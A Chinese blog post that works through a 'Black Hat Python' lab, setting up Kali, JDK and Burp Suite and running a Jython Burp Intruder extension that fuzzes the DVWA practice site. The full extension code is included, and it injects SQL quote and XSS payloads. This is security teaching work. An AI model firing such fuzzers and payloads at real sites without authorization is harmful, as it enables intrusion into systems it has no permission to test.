近期收到了電子工業出版社贈送的一本網絡安全書籍《python黑帽子》,書中一共24個實驗,今天複現第15個實驗(burpsuite載核生成器插件),我的測試環境是mbp電腦+kali虛拟機+dvwa線上靶場。目前隻支援python2.7的環境,稍微調整一下軟連結,然後我把kali 上的jdk和burpsuite都解除安裝了,最後用的是jdk 1.8和burpsuite 1.7.36,成功複現了這個實驗,順便說一下,做了好多次實驗之後,唯手熟爾~
ailx10
網絡安全優秀回答者
網絡安全碩士
去咨詢
步驟一:環境準備
kali 安裝jdk1.8
apt-get update
apt-get install software-properties-common
apt-add-repository 'deb http://security.debian.org/debian-security stretch/updates main'
apt-get update
apt-get install openjdk-8-jdk 選擇jdk1.8
update-alternatives --config java 更新python2的軟連接配接
ln -s /usr/bin/python2 /usr/bin/python 安裝較低版本的burpsuite 1.7.36
wget https://portswigger.net/burp/releases/download?product=community&version=1.7.36&type=linux
sudo chmod +x burpsuite_community_linux_v1_7_36.sh
sudo ./burpsuite_community_linux_v1_7_36.sh 導入成功,這裡需要注意路徑中不要有中文
步驟二:實驗網站準備
選擇dvwa線上靶場[1]
步驟三:實戰演練
1、進入xss注入子產品,送出一個字元串
2、然後在burp的proxy子產品,将載核發送到intruder子產品
3、在intruder子產品中payload頁面下,選擇payload type為Extension-generated,然後在payload options裡面選擇BHP Payload Generator 就大功告成了~
4、點選start attack,這裡實際上測試出了彈窗,但是顯示的并不友好
參考代碼:
# -*- coding: utf-8 -*-
# @Time : 2022/6/14 7:15 PM
# @Author : ailx10
# @File : bhf_fuzzer.py
from burp import IBurpExtender
from burp import IIntruderPayloadGeneratorFactory
from burp import IIntruderPayloadGenerator
from java.util import List,ArrayList
import random
class BurpExtender(IBurpExtender,IIntruderPayloadGeneratorFactory):
def registerExtenderCallbacks(self,callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.registerIntruderPayloadGeneratorFactory(self)
return
def getGeneratorName(self):
return "BHP Payload Generator"
def createNewInstance(self,attack):
return BHPFuzzer(self,attack)
class BHPFuzzer(IIntruderPayloadGenerator):
def __init__(self,extender,attack):
self._extender = extender
self._helpers = extender._helpers
self._attack = attack
self.max_payloads = 10
self.num_iterations = 0
return
def hasMorePayloads(self):
if self.num_iterations == self.max_payloads:
return False
else:
return True
def getNextPayload(self,current_payload):
payload = "".join(chr(x) for x in current_payload)
payload = self.mutate_payload(payload)
self.num_iterations += 1
return payload
def reset(self):
self.num_iterations = 0
return
def mutate_payload(self,original_payload):
picker = random.randint(1,3)
offset = random.randint(0,len(original_payload)-1)
front,back = original_payload[:offset],original_payload[offset:]
# SQL
if picker == 1:
front += "'"
# XSS
elif picker == 2:
front += "<img src=xss onerror=alert(1)>"
# Randomly extract a piece of data from the original carrier core, repeat it any number of times,
# and append it to the end of the front block
elif picker == 3:
chunk_length = random.randint(0,len(back)-1)
repeater = random.randint(1,10)
for _ in range(repeater):
front += original_payload[:offset + chunk_length]
return front + back 參考
- ^dvwa線上靶場 https://www.vulnspy.com/dvwa/
釋出于 2022-06-14 21:15